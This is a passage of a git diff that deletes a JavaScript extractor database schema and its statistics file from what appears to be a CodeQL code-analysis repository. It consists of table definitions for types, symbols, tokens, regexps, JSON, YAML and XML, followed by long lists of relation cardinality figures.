@type ref, - int parent: @type ref, - int idx: int ref -); - -case @type.kind of - 0 = @any_type -| 1 = @string_type -| 2 = @number_type -| 3 = @union_type -| 4 = @true_type -| 5 = @false_type -| 6 = @type_reference -| 7 = @object_type -| 8 = @canonical_type_variable_type -| 9 = @typeof_type -| 10 = @void_type -| 11 = @undefined_type -| 12 = @null_type -| 13 = @never_type -| 14 = @plain_symbol_type -| 15 = @unique_symbol_type -| 16 = @objectkeyword_type -| 17 = @intersection_type -| 18 = @tuple_type -| 19 = @lexical_type_variable_type -| 20 = @this_type -| 21 = @number_literal_type -| 22 = @string_literal_type -| 23 = @unknown_type -| 24 = @bigint_type -| 25 = @bigint_literal_type -; - -@boolean_literal_type = @true_type | @false_type; -@symbol_type = @plain_symbol_type | @unique_symbol_type; -@union_or_intersection_type = @union_type | @intersection_type; -@typevariable_type = @canonical_type_variable_type | @lexical_type_variable_type; - -has_asserts_keyword(int node: @predicate_typeexpr ref); - -@typed_ast_node = @expr | @typeexpr | @function; -ast_node_type( - unique int node: @typed_ast_node ref, - int typ: @type ref); - -declared_function_signature( - unique int node: @function ref, - int sig: @signature_type ref -); - -invoke_expr_signature( - unique int node: @invokeexpr ref, - int sig: @signature_type ref -); - -invoke_expr_overload_index( - unique int node: @invokeexpr ref, - int index: int ref -); - -symbols ( - unique int id: @symbol, - int kind: int ref, - varchar(900) name: string ref -); - -symbol_parent ( - unique int symbol: @symbol ref, - int parent: @symbol ref -); - -symbol_module ( - int symbol: @symbol ref, - varchar(900) moduleName: string ref -); - -symbol_global ( - int symbol: @symbol ref, - varchar(900) globalName: string ref -); - -case @symbol.kind of - 0 = @root_symbol -| 1 = @member_symbol -| 2 = @other_symbol -; - -@type_with_symbol = @type_reference | @typevariable_type | @typeof_type | @unique_symbol_type; -@ast_node_with_symbol = @type_definition | @namespace_definition | @toplevel | @typeaccess | @namespace_access | @var_decl | @function | @invokeexpr | @import_declaration | @external_module_reference | @external_module_declaration; - -ast_node_symbol( - unique int node: @ast_node_with_symbol ref, - int symbol: @symbol ref); - -type_symbol( - unique int typ: @type_with_symbol ref, - int symbol: @symbol ref); - -#keyset[typ, name] -type_property( - int typ: @type ref, - varchar(900) name: string ref, - int propertyType: @type ref); - -type_alias( - unique int aliasType: @type ref, - int underlyingType: @type ref); - -@literal_type = @string_literal_type | @number_literal_type | @boolean_literal_type | @bigint_literal_type; -@type_with_literal_value = @string_literal_type | @number_literal_type | @bigint_literal_type; -type_literal_value( - unique int typ: @type_with_literal_value ref, - varchar(900) value: string ref); - -signature_types ( - unique int id: @signature_type, - int kind: int ref, - varchar(900) tostring: string ref, - int type_parameters: int ref, - int required_params: int ref -); - -is_abstract_signature( - unique int sig: @signature_type ref -); - -signature_rest_parameter( - unique int sig: @signature_type ref, - int rest_param_arra_type: @type ref -); - -case @signature_type.kind of - 0 = @function_signature_type -| 1 = @constructor_signature_type -; - -#keyset[typ, kind, index] -type_contains_signature ( - int typ: @type ref, - int kind: int ref, // constructor/call/index - int index: int ref, // ordering of overloaded signatures - int sig: @signature_type ref -); - -#keyset[parent, index] -signature_contains_type ( - int child: @type ref, - int parent: @signature_type ref, - int index: int ref -); - -#keyset[sig, index] -signature_parameter_name ( - int sig: @signature_type ref, - int index: int ref, - varchar(900) name: string ref -); - -number_index_type ( - unique int baseType: @type ref, - int propertyType: @type ref -); - -string_index_type ( - unique int baseType: @type ref, - int propertyType: @type ref -); - -base_type_names( - int typeName: @symbol ref, - int baseTypeName: @symbol ref -); - -self_types( - int typeName: @symbol ref, - int selfType: @type_reference ref -); - -tuple_type_min_length( - unique int typ: @type ref, - int minLength: int ref -); - -tuple_type_rest_index( - unique int typ: @type ref, - int index: int ref -); - -// comments -comments (unique int id: @comment, - int kind: int ref, - int toplevel: @toplevel ref, - varchar(900) text: string ref, - varchar(900) tostring: string ref); - -case @comment.kind of - 0 = @slashslash_comment -| 1 = @slashstar_comment -| 2 = @doc_comment -| 3 = @html_comment_start -| 4 = @htmlcommentend; - -@html_comment = @html_comment_start | @htmlcommentend; -@line_comment = @slashslash_comment | @html_comment; -@block_comment = @slashstar_comment | @doc_comment; - -// source lines -lines (unique int id: @line, - int toplevel: @toplevel ref, - varchar(900) text: string ref, - varchar(2) terminator: string ref); -indentation (int file: @file ref, - int lineno: int ref, - varchar(1) indentChar: string ref, - int indentDepth: int ref); - -// JavaScript parse errors -js_parse_errors (unique int id: @js_parse_error, - int toplevel: @toplevel ref, - varchar(900) message: string ref, - varchar(900) line: string ref); - -// regular expressions -#keyset[parent, idx] -regexpterm (unique int id: @regexpterm, - int kind: int ref, - int parent: @regexpparent ref, - int idx: int ref, - varchar(900) tostring: string ref); - -@regexpparent = @regexpterm | @regexp_literal | @string_literal | @add_expr; - -case @regexpterm.kind of - 0 = @regexp_alt -| 1 = @regexp_seq -| 2 = @regexp_caret -| 3 = @regexp_dollar -| 4 = @regexp_wordboundary -| 5 = @regexp_nonwordboundary -| 6 = @regexp_positive_lookahead -| 7 = @regexp_negative_lookahead -| 8 = @regexp_star -| 9 = @regexp_plus -| 10 = @regexp_opt -| 11 = @regexp_range -| 12 = @regexp_dot -| 13 = @regexp_group -| 14 = @regexp_normal_constant -| 15 = @regexp_hex_escape -| 16 = @regexp_unicode_escape -| 17 = @regexp_dec_escape -| 18 = @regexp_oct_escape -| 19 = @regexp_ctrl_escape -| 20 = @regexp_char_class_escape -| 21 = @regexp_id_escape -| 22 = @regexp_backref -| 23 = @regexp_char_class -| 24 = @regexp_char_range -| 25 = @regexp_positive_lookbehind -| 26 = @regexp_negative_lookbehind -| 27 = @regexp_unicode_property_escape; - -regexp_parse_errors (unique int id: @regexp_parse_error, - int regexp: @regexpterm ref, - varchar(900) message: string ref); - -@regexp_quantifier = @regexp_star | @regexp_plus | @regexp_opt | @regexp_range; -@regexp_escape = @regexp_char_escape | @regexp_char_class_escape | @regexp_unicode_property_escape; -@regexp_char_escape = @regexp_hex_escape | @regexp_unicode_escape | @regexp_dec_escape | @regexp_oct_escape | @regexp_ctrl_escape | @regexp_id_escape; -@regexp_constant = @regexp_normal_constant | @regexp_char_escape; -@regexp_lookahead = @regexp_positive_lookahead | @regexp_negative_lookahead; -@regexp_lookbehind = @regexp_positive_lookbehind | @regexp_negative_lookbehind; -@regexp_subpattern = @regexp_lookahead | @regexp_lookbehind; -@regexp_anchor = @regexp_dollar | @regexp_caret; - -is_greedy (int id: @regexp_quantifier ref); -range_quantifier_lower_bound (unique int id: @regexp_range ref, int lo: int ref); -range_quantifier_upper_bound (unique int id: @regexp_range ref, int hi: int ref); -is_capture (unique int id: @regexp_group ref, int number: int ref); -is_named_capture (unique int id: @regexp_group ref, string name: string ref); -is_inverted (int id: @regexp_char_class ref); -regexp_const_value (unique int id: @regexp_constant ref, varchar(1) value: string ref); -char_class_escape (unique int id: @regexp_char_class_escape ref, varchar(1) value: string ref); -backref (unique int id: @regexp_backref ref, int value: int ref); -named_backref (unique int id: @regexp_backref ref, string name: string ref); -unicode_property_escapename (unique int id: @regexp_unicode_property_escape ref, string name: string ref); -unicode_property_escapevalue (unique int id: @regexp_unicode_property_escape ref, string value: string ref); - -// tokens -#keyset[toplevel, idx] -tokeninfo (unique int id: @token, - int kind: int ref, - int toplevel: @toplevel ref, - int idx: int ref, - varchar(900) value: string ref); - -case @token.kind of - 0 = @token_eof -| 1 = @token_null_literal -| 2 = @token_boolean_literal -| 3 = @token_numeric_literal -| 4 = @token_string_literal -| 5 = @token_regular_expression -| 6 = @token_identifier -| 7 = @token_keyword -| 8 = @token_punctuator; - -// associate comments with the token immediately following them (which may be EOF) -next_token (int comment: @comment ref, int token: @token ref); - -// JSON -#keyset[parent, idx] -json (unique int id: @json_value, - int kind: int ref, - int parent: @json_parent ref, - int idx: int ref, - varchar(900) tostring: string ref); - -json_literals (varchar(900) value: string ref, - varchar(900) raw: string ref, - unique int expr: @json_value ref); - -json_properties (int obj: @json_object ref, - varchar(900) property: string ref, - int value: @json_value ref); - -json_errors (unique int id: @json_parse_error, - varchar(900) message: string ref); - -json_locations(unique int locatable: @json_locatable ref, - int location: @location_default ref); - -case @json_value.kind of - 0 = @json_null -| 1 = @json_boolean -| 2 = @json_number -| 3 = @json_string -| 4 = @json_array -| 5 = @json_object; - -@json_parent = @json_object | @json_array | @file; - -@json_locatable = @json_value | @json_parse_error; - -// locations -@ast_node = @toplevel | @stmt | @expr | @property | @typeexpr; - -@locatable = @file - | @ast_node - | @comment - | @line - | @js_parse_error | @regexp_parse_error - | @regexpterm - | @json_locatable - | @token - | @cfg_node - | @jsdoc | @jsdoc_type_expr | @jsdoc_tag - | @yaml_locatable - | @xmllocatable - | @configLocatable - | @template_placeholder_tag; - -hasLocation (unique int locatable: @locatable ref, - int location: @location ref); - -// CFG -entry_cfg_node (unique int id: @entry_node, int container: @stmt_container ref); -exit_cfg_node (unique int id: @exit_node, int container: @stmt_container ref); -guard_node (unique int id: @guard_node, int kind: int ref, int test: @expr ref); -case @guard_node.kind of - 0 = @falsy_guard -| 1 = @truthy_guard; -@condition_guard = @falsy_guard | @truthy_guard; - -@synthetic_cfg_node = @entry_node | @exit_node | @guard_node; -@cfg_node = @synthetic_cfg_node | @expr_parent; - -successor (int pred: @cfg_node ref, int succ: @cfg_node ref); - -// JSDoc comments -jsdoc (unique int id: @jsdoc, varchar(900) description: string ref, int comment: @comment ref); -#keyset[parent, idx] -jsdoc_tags (unique int id: @jsdoc_tag, varchar(900) title: string ref, - int parent: @jsdoc ref, int idx: int ref, varchar(900) tostring: string ref); -jsdoc_tag_descriptions (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref); -jsdoc_tag_names (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref); - -#keyset[parent, idx] -jsdoc_type_exprs (unique int id: @jsdoc_type_expr, - int kind: int ref, - int parent: @jsdoc_type_expr_parent ref, - int idx: int ref, - varchar(900) tostring: string ref); -case @jsdoc_type_expr.kind of - 0 = @jsdoc_any_type_expr -| 1 = @jsdoc_null_type_expr -| 2 = @jsdoc_undefined_type_expr -| 3 = @jsdoc_unknown_type_expr -| 4 = @jsdoc_void_type_expr -| 5 = @jsdoc_named_type_expr -| 6 = @jsdoc_applied_type_expr -| 7 = @jsdoc_nullable_type_expr -| 8 = @jsdoc_non_nullable_type_expr -| 9 = @jsdoc_record_type_expr -| 10 = @jsdoc_array_type_expr -| 11 = @jsdoc_union_type_expr -| 12 = @jsdoc_function_type_expr -| 13 = @jsdoc_optional_type_expr -| 14 = @jsdoc_rest_type_expr -; - -#keyset[id, idx] -jsdoc_record_field_name (int id: @jsdoc_record_type_expr ref, int idx: int ref, varchar(900) name: string ref); -jsdoc_prefix_qualifier (int id: @jsdoc_type_expr ref); -jsdoc_has_new_parameter (int fn: @jsdoc_function_type_expr ref); - -@jsdoc_type_expr_parent = @jsdoc_type_expr | @jsdoc_tag; - -jsdoc_errors (unique int id: @jsdoc_error, int tag: @jsdoc_tag ref, varchar(900) message: string ref, varchar(900) tostring: string ref); - -@dataflownode = @expr | @function_decl_stmt | @class_decl_stmt | @namespace_declaration | @enum_declaration | @property; - -@optionalchainable = @call_expr | @propaccess; - -isOptionalChaining(int id: @optionalchainable ref); - -/** - * The time taken for the extraction of a file. - * This table contains non-deterministic content. - * - * The sum of the `time` column for each (`file`, `timerKind`) pair - * is the total time taken for extraction of `file`. The `extractionPhase` - * column provides a granular view of the extraction time of the file. - */ -extraction_time( - int file : @file ref, - // see `com.semmle.js.extractor.ExtractionMetrics.ExtractionPhase`. - int extractionPhase: int ref, - // 0 for the elapsed CPU time in nanoseconds, 1 for the elapsed wallclock time in nanoseconds - int timerKind: int ref, - float time: float ref -) - -/** -* Non-timing related data for the extraction of a single file. -* This table contains non-deterministic content. -*/ -extraction_data( - int file : @file ref, - // the absolute path to the cache file - varchar(900) cacheFile: string ref, - boolean fromCache: boolean ref, - int length: int ref -) - -/*- YAML -*/ - -#keyset[parent, idx] -yaml (unique int id: @yaml_node, - int kind: int ref, - int parent: @yaml_node_parent ref, - int idx: int ref, - string tag: string ref, - string tostring: string ref); - -case @yaml_node.kind of - 0 = @yaml_scalar_node -| 1 = @yaml_mapping_node -| 2 = @yaml_sequence_node -| 3 = @yaml_alias_node -; - -@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node; - -@yaml_node_parent = @yaml_collection_node | @file; - -yaml_anchors (unique int node: @yaml_node ref, - string anchor: string ref); - -yaml_aliases (unique int alias: @yaml_alias_node ref, - string target: string ref); - -yaml_scalars (unique int scalar: @yaml_scalar_node ref, - int style: int ref, - string value: string ref); - -yaml_errors (unique int id: @yaml_error, - string message: string ref); - -yaml_locations(unique int locatable: @yaml_locatable ref, - int location: @location_default ref); - -@yaml_locatable = @yaml_node | @yaml_error; - -/*- XML Files -*/ - -xmlEncoding( - unique int id: @file ref, - string encoding: string ref -); - -xmlDTDs( - unique int id: @xmldtd, - string root: string ref, - string publicId: string ref, - string systemId: string ref, - int fileid: @file ref -); - -xmlElements( - unique int id: @xmlelement, - string name: string ref, - int parentid: @xmlparent ref, - int idx: int ref, - int fileid: @file ref -); - -xmlAttrs( - unique int id: @xmlattribute, - int elementid: @xmlelement ref, - string name: string ref, - string value: string ref, - int idx: int ref, - int fileid: @file ref -); - -xmlNs( - int id: @xmlnamespace, - string prefixName: string ref, - string URI: string ref, - int fileid: @file ref -); - -xmlHasNs( - int elementId: @xmlnamespaceable ref, - int nsId: @xmlnamespace ref, - int fileid: @file ref -); - -xmlComments( - unique int id: @xmlcomment, - string text: string ref, - int parentid: @xmlparent ref, - int fileid: @file ref -); - -xmlChars( - unique int id: @xmlcharacters, - string text: string ref, - int parentid: @xmlparent ref, - int idx: int ref, - int isCDATA: int ref, - int fileid: @file ref -); - -@xmlparent = @file | @xmlelement; -@xmlnamespaceable = @xmlelement | @xmlattribute; - -xmllocations( - int xmlElement: @xmllocatable ref, - int location: @location_default ref -); - -@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace; - -/*- Configuration files with key value pairs -*/ - -configs( - unique int id: @config -); - -configNames( - unique int id: @configName, - int config: @config ref, - string name: string ref -); - -configValues( - unique int id: @configValue, - int config: @config ref, - string value: string ref -); - -configLocations( - int locatable: @configLocatable ref, - int location: @location_default ref -); - -@configLocatable = @config | @configName | @configValue; diff --git a/ql/lib/semmlecode.javascript.dbscheme.stats b/ql/lib/semmlecode.javascript.dbscheme.stats deleted file mode 100644 index 97ba6f9bcc36..000000000000 --- a/ql/lib/semmlecode.javascript.dbscheme.stats +++ /dev/null @@ -1,28248 +0,0 @@ - - - - -@location_default -15664049 - - -@file -6457 - - -@folder -1590 - - -@externalDataElement -950 - - -@toplevel -5320 - - -@script -5200 - - -@inline_script -86 - - -@event_handler -31 - - -@javascript_url -3 - - -@template_toplevel -100 - - -@stmt -1096691 - - -@empty_stmt -1136 - - -@block_stmt -204994 - - -@expr_stmt -610340 - - -@if_stmt -68214 - - -@labeled_stmt -1378 - - -@break_stmt -10149 - - -@continue_stmt -1642 - - -@with_stmt -4 - - -@switch_stmt -1569 - - -@return_stmt -48209 - - -@throw_stmt -2305 - - -@try_stmt -1316 - - -@while_stmt -3120 - - -@do_while_stmt -1471 - - -@for_stmt -5385 - - -@for_in_stmt -1315 - - -@debugger_stmt -3 - - -@function_decl_stmt -16771 - - -@var_decl_stmt -105606 - - -@case -8674 - - -@catch_clause -1272 - - -@for_of_stmt -61 - - -@const_decl_stmt -1118 - - -@let_stmt -551 - - -@legacy_let_stmt -1 - - -@for_each_stmt -1 - - -@class_decl_stmt -41 - - -@import_declaration -8 - - -@export_all_declaration -1 - - -@export_as_namespace_declaration -5 - - -@global_augmentation_declaration -5 - - -@using_decl_stmt -5 - - -@export_default_declaration -5 - - -@export_named_declaration -31 - - -@expr -5495305 - - -@label -722373 - - -@null_literal -15525 - - -@boolean_literal -31652 - - -@number_literal -557620 - - -@string_literal -268843 - - -@regexp_literal -2773 - - -@this_expr -128651 - - -@array_expr -28131 - - -@obj_expr -50958 - - -@function_expr -95744 - - -@seq_expr -2457 - - -@conditional_expr -8111 - - -@new_expr -19023 - - -@call_expr -487075 - - -@dot_expr -602582 - - -@index_expr -105192 - - -@neg_expr -11993 - - -@plus_expr -731 - - -@log_not_expr -19385 - - -@bit_not_expr -403 - - -@typeof_expr -4540 - - -@void_expr -51 - - -@delete_expr -1310 - - -@eq_expr -13468 - - -@neq_expr -5338 - - -@eqq_expr -17758 - - -@neqq_expr -5818 - - -@lt_expr -10254 - - -@le_expr -1503 - - -@gt_expr -5438 - - -@ge_expr -2527 - - -@lshift_expr -5655 - - -@rshift_expr -27749 - - -@urshift_expr -4331 - - -@add_expr -88032 - - -@sub_expr -10789 - - -@mul_expr -14075 - - -@div_expr -2496 - - -@mod_expr -655 - - -@bitor_expr -42853 - - -@xor_expr -503 - - -@bitand_expr -8538 - - -@in_expr -1135 - - -@instanceof_expr -1184 - - -@logand_expr -15892 - - -@logor_expr -12711 - - -@assign_expr -245084 - - -@assign_add_expr -6231 - - -@assign_sub_expr -823 - - -@assign_mul_expr -143 - - -@assign_div_expr -44 - - -@assign_mod_expr -17 - - -@assign_lshift_expr -57 - - -@assign_rshift_expr -86 - - -@assign_urshift_expr -96 - - -@assign_or_expr -586 - - -@assign_xor_expr -108 - - -@assign_and_expr -222 - - -@assignlogandexpr -1 - - -@assignlogorexpr -1 - - -@assignnullishcoalescingexpr -1 - - -@template_placeholder_tag -100 - - -@template_pipe_ref -100 - - -@generated_code_expr -100 - - -@satisfies_expr -100 - - -@preinc_expr -1792 - - -@postinc_expr -7103 - - -@predec_expr -457 - - -@postdec_expr -774 - - -@par_expr -86199 - - -@var_declarator -130843 - - -@arrow_function_expr -3730 - - -@spread_element -50 - - -@array_pattern -57 - - -@object_pattern -122 - - -@yield_expr -81 - - -@tagged_template_expr -27 - - -@template_literal -408 - - -@template_literal_typeexpr -100 - - -@template_element -639 - - -@array_comprehension_expr -3 - - -@generator_expr -1 - - -@for_in_comprehension_block -1 - - -@for_of_comprehension_block -3 - - -@legacy_letexpr -1 - - -@var_decl -250257 - - -@proper_varaccess -1295408 - - -@super_expr -11 - - -@newtarget_expr -1 - - -@import_meta_expr -1 - - -@named_import_specifier -4 - - -@import_default_specifier -4 - - -@import_namespace_specifier -2 - - -@named_export_specifier -5 - - -@export_default_specifier -5 - - -@export_namespace_specifier -5 - - -@export_assign_declaration -5 - - -@interface_declaration -5 - - -@type_alias_declaration -120 - - -@enum_declaration -252 - - -@external_module_declaration -100 - - -@external_module_reference -5 - - -@expression_with_type_arguments -45 - - -@prefix_type_assertion -1721 - - -@as_type_assertion -368 - - -@export_varaccess -15 - - -@decorator_list -2575 - - -@non_null_assertion -2159 - - -@dynamic_import -5 - - -@import_equals_declaration -5 - - -@namespace_declaration -5 - - -@namespace_scope -5 - - -@exp_expr -14075 - - -@assign_exp_expr -143 - - -@class_expr -41 - - -@scope -118172 - - -@global_scope -1 - - -@function_scope -116245 - - -@catch_scope -1272 - - -@module_scope -21 - - -@block_scope -584 - - -@for_scope -17 - - -@for_in_scope -28 - - -@comprehension_block_scope -4 - - -@class_expr_scope -41 - - -@class_decl_scope -2693 - - -@interface_scope -200 - - -@type_alias_scope -11 - - -@enum_scope -252 - - -@external_module_scope -100 - - -@mapped_type_scope -10 - - -@conditional_type_scope -100 - - -@variable -364388 - - -@local_type_name -23565 - - -@local_namespace_name -20832 - - -@property -142723 - - -@value_property -140856 - - -@property_getter -1529 - - -@property_setter -338 - - -@jsx_attribute -100 - - -@function_call_signature -2458 - - -@constructor_call_signature -37 - - -@index_signature -504 - - -@enum_member -2026 - - -@proper_field -16934 - - -@parameter_field -2693 - - -@static_initializer -100 - - -@local_type_access -25491 - - -@type_decl -2513 - - -@keyword_typeexpr -25306 - - -@string_literal_typeexpr -733 - - -@number_literal_typeexpr -3 - - -@boolean_literal_typeexpr -4 - - -@array_typeexpr -4579 - - -@union_typeexpr -852 - - -@intersection_typeexpr -27 - - -@parenthesized_typeexpr -62 - - -@tuple_typeexpr -98 - - -@keyof_typeexpr -3 - - -@indexed_access_typeexpr -3 - - -@qualified_type_access -3559 - - -@import_namespace_access -100 - - -@import_type_access -100 - - -@import_var_type_access -100 - - -@optional_typeexpr -100 - - -@rest_typeexpr -100 - - -@readonly_typeexpr -100 - - -@bigint_literal_typeexpr -100 - - -@generic_typeexpr -5220 - - -@type_label -3559 - - -@typeof_typeexpr -24 - - -@local_var_type_access -24 - - -@qualified_var_type_access -15 - - -@this_var_type_access -20 - - -@predicate_typeexpr -86 - - -@interface_typeexpr -1038 - - -@type_parameter -3463 - - -@plain_function_typeexpr -1674 - - -@local_namespace_access -4671 - - -@qualified_namespace_access -20 - - -@constructor_typeexpr -20 - - -@mapped_typeexpr -20 - - -@conditional_typeexpr -100 - - -@infer_typeexpr -100 - - -@comment -104947 - - -@any_type -1 - - -@string_type -1 - - -@number_type -1 - - -@union_type -1802 - - -@true_type -1 - - -@false_type -1 - - -@type_reference -12383 - - -@object_type -159099 - - -@canonical_type_variable_type -650 - - -@typeof_type -2903 - - -@void_type -1 - - -@undefined_type -1 - - -@null_type -1 - - -@never_type -1 - - -@plain_symbol_type -1 - - -@objectkeyword_type -1 - - -@intersection_type -369 - - -@tuple_type -307 - - -@lexical_type_variable_type -50 - - -@this_type -2731 - - -@number_literal_type -1244 - - -@string_literal_type -30638 - - -@unknown_type -100 - - -@bigint_type -100 - - -@bigint_literal_type -100 - - -@unique_symbol_type -100 - - -@root_symbol -2385 - - -@member_symbol -7223 - - -@other_symbol -584 - - -@function_signature_type -34698 - - -@constructor_signature_type -2646 - - -@slashslash_comment -76841 - - -@slashstar_comment -8834 - - -@doc_comment -19270 - - -@html_comment_start -1 - - -@htmlcommentend -1 - - -@line -1622184 - - -@js_parse_error -8 - - -@regexpterm -33197 - - -@regexp_alt -641 - - -@regexp_seq -3371 - - -@regexp_caret -826 - - -@regexp_dollar -637 - - -@regexp_wordboundary -99 - - -@regexp_nonwordboundary -3 - - -@regexp_positive_lookahead -15 - - -@regexp_negative_lookahead -12 - - -@regexp_star -1057 - - -@regexp_plus -1067 - - -@regexp_opt -478 - - -@regexp_range -146 - - -@regexp_dot -445 - - -@regexp_group -1692 - - -@regexp_normal_constant -15489 - - -@regexp_hex_escape -59 - - -@regexp_unicode_escape -264 - - -@regexp_dec_escape -7 - - -@regexp_oct_escape -1 - - -@regexp_ctrl_escape -599 - - -@regexp_char_class_escape -1573 - - -@regexp_id_escape -2613 - - -@regexp_backref -11 - - -@regexp_char_class -1473 - - -@regexp_char_range -619 - - -@regexp_positive_lookbehind -15 - - -@regexp_negative_lookbehind -12 - - -@regexp_unicode_property_escape -12 - - -@regexp_parse_error -122 - - -@token -8770869 - - -@token_eof -5312 - - -@token_null_literal -15526 - - -@token_boolean_literal -31654 - - -@token_numeric_literal -557620 - - -@token_string_literal -269555 - - -@token_regular_expression -2773 - - -@token_identifier -2268328 - - -@token_keyword -551767 - - -@token_punctuator -5068334 - - -@json_value -1643352 - - -@json_null -24 - - -@json_boolean -654 - - -@json_number -273113 - - -@json_string -752355 - - -@json_array -175925 - - -@json_object -441281 - - -@json_parse_error -1 - - -@entry_node -121542 - - -@exit_node -121542 - - -@guard_node -177785 - - -@jsdoc -19270 - - -@falsy_guard -86336 - - -@truthy_guard -91449 - - -@jsdoc_tag -29323 - - -@jsdoc_type_expr -22481 - - -@jsdoc_any_type_expr -292 - - -@jsdoc_null_type_expr -35 - - -@jsdoc_undefined_type_expr -287 - - -@jsdoc_unknown_type_expr -27 - - -@jsdoc_void_type_expr -8 - - -@jsdoc_named_type_expr -18639 - - -@jsdoc_applied_type_expr -303 - - -@jsdoc_nullable_type_expr -310 - - -@jsdoc_non_nullable_type_expr -536 - - -@jsdoc_record_type_expr -91 - - -@jsdoc_array_type_expr -19 - - -@jsdoc_union_type_expr -668 - - -@jsdoc_function_type_expr -316 - - -@jsdoc_optional_type_expr -895 - - -@jsdoc_rest_type_expr -55 - - -@jsdoc_error -1658 - - -@yaml_node -885 - - -@yaml_scalar_node -700 - - -@yaml_mapping_node -149 - - -@yaml_sequence_node -35 - - -@yaml_alias_node -1 - - -@yaml_error -1 - - -@jsx_element -1090 - - -@jsx_qualified_name -100 - - -@jsx_empty_expr -100 - - -@await_expr -100 - - -@function_sent_expr -100 - - -@decorator -100 - - -@bind_expr -100 - - -@bigint_literal -100 - - -@nullishcoalescing_expr -100 - - -@e4x_xml_anyname -100 - - -@e4x_xml_static_attribute_selector -100 - - -@e4x_xml_dynamic_attribute_selector -100 - - -@e4x_xml_filter_expression -100 - - -@e4x_xml_static_qualident -100 - - -@e4x_xml_dynamic_qualident -100 - - -@e4x_xml_dotdotexpr -100 - - -@xmldtd -1 - - -@xmlelement -1270313 - - -@xmlattribute -1202020 - - -@xmlnamespace -4185 - - -@xmlcomment -26812 - - -@xmlcharacters -439958 - - -@optionalchainable -100 - - -@nullishcoalescing_expr -100 - - -@config -69795 - - -@configName -69794 - - -@configValue -69691 - - - - - -locations_default -id -15664049 - - -id -15664049 - - -file -6457 - - -beginLine -277405 - - -beginColumn -117878 - - -endLine -277405 - - -endColumn -117868 - - - - -id -file - - -12 - - -1 -2 -15664049 - - - - - - -id -beginLine - - -12 - - -1 -2 -15664049 - - - - - - -id -beginColumn - - -12 - - -1 -2 -15664049 - - - - - - -id -endLine - - -12 - - -1 -2 -15664049 - - - - - - -id -endColumn - - -12 - - -1 -2 -15664049 - - - - - - -file -id - - -12 - - -1 -2 -674 - - -2 -28 -501 - - -28 -105 -488 - - -105 -211 -488 - - -211 -335 -490 - - -335 -477 -485 - - -477 -637 -488 - - -637 -856 -486 - - -856 -1141 -485 - - -1141 -1602 -485 - - -1604 -2336 -486 - - -2336 -4472 -485 - - -4472 -2368854 -416 - - - - - - -file -beginLine - - -12 - - -1 -2 -674 - - -2 -13 -509 - - -13 -23 -513 - - -23 -35 -516 - - -35 -50 -504 - - -50 -69 -506 - - -69 -92 -489 - - -92 -124 -504 - - -124 -165 -487 - - -165 -230 -490 - - -230 -357 -491 - - -357 -737 -485 - - -737 -277406 -289 - - - - - - -file -beginColumn - - -12 - - -1 -2 -674 - - -2 -12 -491 - - -12 -32 -495 - - -32 -46 -510 - - -46 -56 -498 - - -56 -62 -488 - - -62 -67 -500 - - -67 -71 -477 - - -71 -75 -583 - - -75 -78 -497 - - -78 -80 -403 - - -80 -82 -543 - - -82 -117856 -298 - - - - - - -file -endLine - - -12 - - -1 -2 -674 - - -2 -13 -509 - - -13 -23 -509 - - -23 -35 -520 - - -35 -50 -504 - - -50 -69 -506 - - -69 -92 -489 - - -92 -124 -504 - - -124 -165 -487 - - -165 -230 -490 - - -230 -357 -491 - - -357 -737 -485 - - -737 -277406 -289 - - - - - - -file -endColumn - - -12 - - -1 -2 -682 - - -2 -18 -501 - - -18 -36 -487 - - -36 -51 -513 - - -51 -61 -532 - - -61 -67 -508 - - -67 -72 -568 - - -72 -75 -444 - - -75 -78 -514 - - -78 -80 -484 - - -80 -81 -283 - - -81 -82 -579 - - -82 -117837 -362 - - - - - - -beginLine -id - - -12 - - -1 -6 -666 - - -7 -8 -116499 - - -8 -14 -19181 - - -14 -15 -29298 - - -15 -19 -25329 - - -19 -24 -17273 - - -24 -29 -22410 - - -29 -56 -21150 - - -56 -242 -20830 - - -242 -134468 -4769 - - - - - - -beginLine -file - - -12 - - -1 -2 -117975 - - -2 -3 -120803 - - -3 -8 -21079 - - -8 -6458 -17548 - - - - - - -beginLine -beginColumn - - -12 - - -1 -5 -667 - - -5 -6 -116499 - - -6 -11 -19126 - - -11 -12 -32612 - - -12 -15 -18313 - - -15 -17 -18964 - - -17 -21 -21845 - - -21 -31 -21197 - - -31 -64 -20988 - - -64 -94454 -7194 - - - - - - -beginLine -endLine - - -12 - - -1 -2 -238980 - - -2 -3 -22312 - - -3 -890 -16113 - - - - - - -beginLine -endColumn - - -12 - - -1 -5 -667 - - -5 -6 -116499 - - -6 -12 -20939 - - -12 -13 -28687 - - -13 -16 -19707 - - -16 -18 -20057 - - -18 -22 -21035 - - -22 -33 -21605 - - -33 -69 -21089 - - -69 -94455 -7120 - - - - - - -beginColumn -id - - -12 - - -1 -2 -5117 - - -2 -3 -9246 - - -3 -4 -13440 - - -4 -5 -15857 - - -5 -6 -13813 - - -6 -7 -11696 - - -7 -8 -8777 - - -8 -9 -6887 - - -9 -11 -9723 - - -11 -14 -10392 - - -14 -20 -9364 - - -20 -2248970 -3566 - - - - - - -beginColumn -file - - -12 - - -1 -2 -68610 - - -2 -3 -15842 - - -3 -4 -7965 - - -4 -5 -9221 - - -5 -6 -8014 - - -6 -6458 -8226 - - - - - - -beginColumn -beginLine - - -12 - - -1 -2 -6868 - - -2 -3 -15317 - - -3 -4 -24725 - - -4 -5 -25386 - - -5 -6 -10178 - - -6 -7 -6239 - - -7 -9 -10825 - - -9 -11 -9294 - - -11 -1255 -8841 - - -1258 -277405 -205 - - - - - - -beginColumn -endLine - - -12 - - -1 -2 -6868 - - -2 -3 -15317 - - -3 -4 -24725 - - -4 -5 -25386 - - -5 -6 -10175 - - -6 -7 -6232 - - -7 -9 -10827 - - -9 -11 -9299 - - -11 -1227 -8842 - - -1256 -277405 -207 - - - - - - -beginColumn -endColumn - - -12 - - -1 -2 -24039 - - -2 -3 -21662 - - -3 -4 -22809 - - -4 -5 -17118 - - -5 -6 -12038 - - -6 -7 -7768 - - -7 -10 -9297 - - -10 -1064 -3147 - - - - - - -endLine -id - - -12 - - -1 -6 -666 - - -7 -8 -116499 - - -8 -14 -18715 - - -14 -15 -30262 - - -15 -19 -24946 - - -19 -24 -17066 - - -24 -29 -22451 - - -29 